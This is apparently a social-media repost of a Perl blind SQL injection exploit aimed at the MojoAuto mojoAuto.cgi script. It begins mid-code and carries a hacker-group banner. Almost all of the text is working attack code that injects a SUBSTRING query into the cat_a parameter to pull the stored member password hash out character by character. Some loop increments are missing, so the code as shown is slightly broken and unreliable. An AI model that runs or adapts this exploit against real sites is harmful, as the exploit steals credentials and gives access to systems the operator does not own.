else
{
return 0;
}
}
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit :
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #################### Viva IslaMe Viva IslaMe ################\n";
print " # MojoAuto Blind SQL Injection Exploit #\n";
print " # (mojoAuto.cgi mojo ) #\n";
print " # Author: Mr.SQL #\n";
print " # EMAIL : SQL@HOTMAIL.IT #\n";
print " # #\n";
print " # -((:: GrE3E3E3E3E3ETZ ::))- #\n";
print " # #\n";
print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #\n";
print " # :: ALwHeD :: milw0rm :: #\n";
print " # #\n";
print " # <<>> MuSliMs HaCkErS <<>> #\n";
print " # #\n";
print " # HOME: WwW.PaL-HaCkEr.CoM #\n";
print " # #\n";
print " # Usage : perl test.pl host #\n";
print " # Example: perl test.pl www.host.com / -d 10 #\n";
print " # Options: #\n";
print " # -d valid cat_a value #\n";
print " #############################################################\n";
exit;
}
my $host = $ARGV[0];
my $cat_a = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
print "[~] Exploiting...\n";
if($options{"b"})
{
$mojo = $options{"b"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i )
{
my $f = 0;
my $h = 48;
while(!$f && $h <= 57)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
if(!$f)
{
$h = 97;
while(!$f && $h <= 122)
{
if(istrue2($host, $cat_a, $i, $h))
{
$f = 1;
syswrite(STDOUT, chr($h), 1);
}
$h ;
}
}
}
print "\n[~] Exploiting done\n";
sub istrue2
{
my $host = shift;
my $cat_a = shift;
my $i = shift;
my $h = shift; my $ua = LWP::UserAgent->new;
my $query = "http://".$host."mojoAuto.cgi?mojo=1&action=browse&cat_a=".$cat_a." and (SUBSTRING((SELECT password FROM member LIMIT 0,1),".$i.",1))=CHAR(".$h.")"; if($options{"p"})
{
$ua->proxy('http', "http://".$options{"p"});
} my $resp = $ua->get($query);
my $content = $resp->content;
my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)
{
return 1;
}
else
{
return 0;
}
}
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β